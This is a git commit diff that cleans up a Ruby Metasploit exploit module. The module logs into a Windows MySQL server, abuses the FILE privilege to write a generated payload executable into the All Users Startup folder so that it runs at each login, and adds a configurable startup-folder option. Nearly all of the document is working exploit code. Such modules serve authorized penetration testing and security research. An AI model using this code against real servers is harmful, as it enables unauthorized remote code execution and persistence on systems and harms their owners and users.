Do code cleanup
parent
d52e9d4e21
commit
2c633e403e
|
@ -18,7 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module takes advantage of a file privilege misconfiguration problem
|
||||
specifically against Windows MySQL servers. This module abuses the FILE
|
||||
privilege to write a payload to Microsoft's All Users Start Up directory
|
||||
which will execute every time a user logs in.
|
||||
which will execute every time a user logs in. The default All Users Start
|
||||
Up directory used by the module is Windows 7 friendly.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -49,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
OptString.new('USERNAME', [ true, 'The username to authenticate as']),
|
||||
OptString.new('PASSWORD', [ true, 'The password to authenticate with'])
|
||||
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
|
||||
OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -84,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def is_windows?
|
||||
r = query("SELECT @@version_compile_os;")
|
||||
return (r[0]['@@version_compile_os'] =~ /^Win/) ? true : false
|
||||
r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
|
||||
end
|
||||
|
||||
def get_drive_letter
|
||||
|
@ -103,38 +105,35 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
|
||||
begin
|
||||
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
return if not m
|
||||
rescue RbMysql::AccessDeniedError
|
||||
print_error("#{peer} - Access denied.")
|
||||
return
|
||||
fail_with(Failure::NoAccess, "#{peer} - Access denied")
|
||||
end
|
||||
|
||||
fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m
|
||||
|
||||
unless is_windows?
|
||||
print_error("#{peer} - Remote host isn't Windows.")
|
||||
return
|
||||
fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
|
||||
end
|
||||
|
||||
begin
|
||||
drive = get_drive_letter
|
||||
return unless drive
|
||||
rescue RbMysql::ParseError
|
||||
print_error("Could not determine drive name")
|
||||
return
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
|
||||
end
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive
|
||||
|
||||
exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
|
||||
dest = "#{drive}:/programdata/microsoft/windows/start menu/programs/startup/#{exe_name}"
|
||||
dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
|
||||
exe = generate_payload_exe
|
||||
|
||||
print_status("#{peer} - Uploading to '#{dest}'")
|
||||
begin
|
||||
upload_file(exe, dest)
|
||||
register_file_for_cleanup("#{dest}")
|
||||
rescue RbMysql::AccessDeniedError
|
||||
print_error("#{peer} - No permission to write. I blame kc :-)")
|
||||
return
|
||||
fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
|
||||
end
|
||||
|
||||
register_file_for_cleanup("#{dest}")
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue